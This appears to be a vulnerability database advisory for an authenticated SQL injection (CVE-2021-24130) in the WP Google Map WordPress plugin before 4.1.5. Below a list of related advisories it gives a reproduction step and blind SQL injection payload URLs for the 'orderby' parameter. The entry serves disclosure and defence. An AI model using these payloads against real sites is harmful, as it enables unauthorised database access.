Lucene search
+L

WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection

🗓️ 25 Nov 2020 00:00:00Reported by Nguyen Anh TienType 
wpexploit
 wpexploit
👁 737 Views

WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection via order and orderby parameter

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-24130
18 Mar 202115:15
attackerkb
circl
Circl
CVE-2021-24130
18 Mar 202117:32
circl
cnnvd
CNNVD
Wordpress WP Google Map SQL注入漏洞
18 Mar 202100:00
cnnvd
cnvd
CNVD
Wordpress WP Google Map SQL Injection Vulnerability
19 Mar 202100:00
cnvd
cve
CVE
CVE-2021-24130
18 Mar 202114:57
cve
cvelist
Cvelist
CVE-2021-24130 WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection
18 Mar 202114:57
cvelist
euvd
EUVD
EUVD-2021-11044
7 Oct 202500:30
euvd
nvd
NVD
CVE-2021-24130
18 Mar 202115:15
nvd
openvas
OpenVAS
WordPress WP Google Map Plugin < 4.1.5 SQLi Vulnerability
22 Mar 202100:00
openvas
osv
OSV
CVE-2021-24130
18 Mar 202115:15
osv
Rows per page
- Vulnerable parameters: `order` and `orderby`

1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:

https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))

2. The request will be delayed by 10 seconds.

---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)
---

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation